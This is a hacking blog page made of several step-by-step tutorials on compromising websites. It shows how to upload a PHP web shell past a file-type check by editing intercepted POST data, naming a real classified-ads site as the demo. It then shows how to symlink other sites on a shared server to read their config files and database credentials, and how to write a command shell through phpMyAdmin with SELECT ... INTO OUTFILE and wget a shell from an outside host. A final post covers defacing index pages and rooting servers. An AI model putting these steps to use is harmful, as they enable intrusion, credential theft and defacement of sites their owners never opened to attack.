Powered by Blogger.

Translate

Popular Posts

About

IP Address Checker
IP Address Checker

Blogger news

Blogroll

Search

Blogger templates

RSS

How to Upload PHP Shell Through Tamper Data an Firefox Add-on?

Many times you get login of a website, but you are unable to upload your PHP shell !
Today i'll show you how to upload your PHP shell through Tamper Data an Firefox Add-on

Install Tamper Data firefox add-on:
Download Tamper Data here
Now Install it and Restart Firefox

Rename shell:

Note: You have to rename you .php shell to .jpg to bypass the website's security
To upload a shell, of-course you needed a upload option in login page or anywhere !

Demo:

As an example i'll take - http://freead1.net/post-free-ad-to-USA-42

It is a free classified ads posting website, so i got a upload option there !

Find your upload option click on browse, locate you .jpg shell and select it !

Now click on Tools in Firefox Menu bar and Select Tamper Data, Tamper Data plugin will open in a new window !

Before Clicking on Upload button click on "Start Tamper" in Tamper Data window..
Note: Before Clicking on "Start Tamper" close every extra tab you have opened.. If you want this tutorial to be open... Just open it in another browser

Now click on upload button !


After clicking on upload button "Tamper with request?" window will appear !

Click on "Tamper" button

After a click on "Tamper" you will see "Tamper Popup"
In Tamper Popup Window, Copy "POST_DATA" text in Notepad

After Copying it to Notepad... "Find yourshell.jpg" and rename it to .php.
Now copy Notepad's text back to "POST_DATA" field..and click OK
It will Upload the shell as .php and you can execute it easily !
Find your .php shell & do whatever you wanted with that website
that's all !

Note: Website Taken as example is patched by the webmaster !

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Symlink Tutorial



Hello Guys, Today I'm going to explain how to symlink websites in two different methods.

So Lets Start!

[#] Explanation

First I will explain what symlink can do, Symlinking is making Symbolic links to other websites on the same server to read their configuration files, connect to their database, and get the information needed to get access to their Control panel.
and that's about it :)



[#] Method #1


After uploading you shell on the server make a directory with the command bellow:

mkdir sym


NOTE:- The directory can be called whatever you want, just change the "sym" to any name.


Enter your new directory then upload OR create a file called ".htaccess" in the new directory with the code bellow inside it:


Options all 

DirectoryIndex Sux.html 

AddType text/plain .php 

AddHandler server-parsed .php
  AddType text/plain .html 

AddHandler txt .html 

Require None 

Satisfy Any
Like this picture:

After that, we will run the command bellow to create a symlink to "/" directory:
ln -s / root
and it will look like this:

And if we opened the directory "sym" from our browser like "www.website.com/sym" it should look like this:

in the image above my shell was in /downloads so I made "sym" directory inside /downloads
and our process is almost done, now we just have to get the user of the target website.
I've provided user.php code in the bottom of the post, this script will give you all the websites on the server and their username.

when you get the username of your target, just open the link like this:


www.website.com/sym/root/home/(user)/public_html

where (user) = the user of the target
here is a picture for example:

where the user was "hillock"
now the next step is easy, we will start looking for the configuration its usually called config.php, or configuration.php. here are the location of configuration files in the most famous webapps out there.
vBulletin -- /includes/config.php

IPB -- /conf_global.php

MyBB -- /inc/config.php

Phpbb -- /config.php

Php Nuke -- /config.php

Php-Fusion -- config.php

SMF -- /Settings.php

Joomla -- configuration.php , configuration.php-dist

WordPress -- /wp-config.php

Drupal -- /sites/default/settings.php

Oscommerce -- /includes/configure.php

e107 -- /e107_config.php

Seditio -- /datas/config.php


when you find the configuration file, it will contain the database details.

it will look like the image bellow (image bellow is joomla configuration file):

now upload SQL.php (code provided bellow)
and connect to the database.
Congrats :) now you can get all the details from admin table, and even change it.

[#] Method #2


In this method, we wont symlink the root directory, we will symlink the target's public_html dir directly.

To do this, just follow those steps,
1. Make the a new directory, just like method 1
2. make ".htaccess" OR upload it with the code bellow:
Options Indexes FollowSymlinks

DirectoryIndex z0mbie.htm

AddType txt .php

AddHandler txt .php

3. run the following comman:
ln -s /home/(user)/public_html (user)

where (user) = the target's user
and it will look like this when we open it in our browser:
in the picture the user name of my target was "csseipsn"
now you just have to find the configuration and connect :)

Scripts Needed:

User.php Source Code

SQL.php Source Code


LIKE ALWAYS ITS ONLY FOR EDUCATIONAL PURPOSE ONLY!

Source: Security Geeks

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Shell Uploading Through PhpMyAdmin

Requirements:-

-You must have the full path
-pma & mysql db privileges.
Its not every day u get to use this its rare, but today i exploited a site by this so thought of writing a tutorial. Ok then lets start.

First login in to mysql



now click 'Show MySQL system varible"


then 'SQL'.


now you can run sql commands,like create db, delete tables or whatever. we want to upload shell so lets move on to it.
now we will create a cmd line into a new file,with select into.
SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "full/path/here/cmd.php"

and click 'Go'.


Now, the cmd line is here http://site.com/cmd.php lets run the command to get shell.
wget http://www.r57.biz/r57.txt;mv r57.txt shell.php



N thats it, we have shell on the server 
Stay Safe and gud luck :)

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

What is Shell And How to Use it?

After getting the admin access in the website attacker will upload his own control penal

that’s called shell. It helps attacker to maintain access for the long time. There are many

types of shells like DDOS shell, symlink shell etc.

Using shell attacker can destroy whole database and he can leak the database of the website

and using the shell he can root the server. (Only Linux server can be rooted windows server

cant be rooted because there is no ROOT :P) After rooting he can destroy whole server.

Suppose One server contains 500 websites and attacker got the admin access in the single

site and he have rooted that server then 500 sites can be destroyed !
USES OF SHELL

1. Using shell you can Destroy the INDEX page of the website.
2. You can host your files in the Server.
3. You can root the server.

Now if you want to destroy the index page of the website then find the “INDEX” page from

the list and replace that coding with your own deface page. And using browse option you can

host your own file in the server. You can create your own shell and you can add your own

tools in your shell for that you know PHP.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS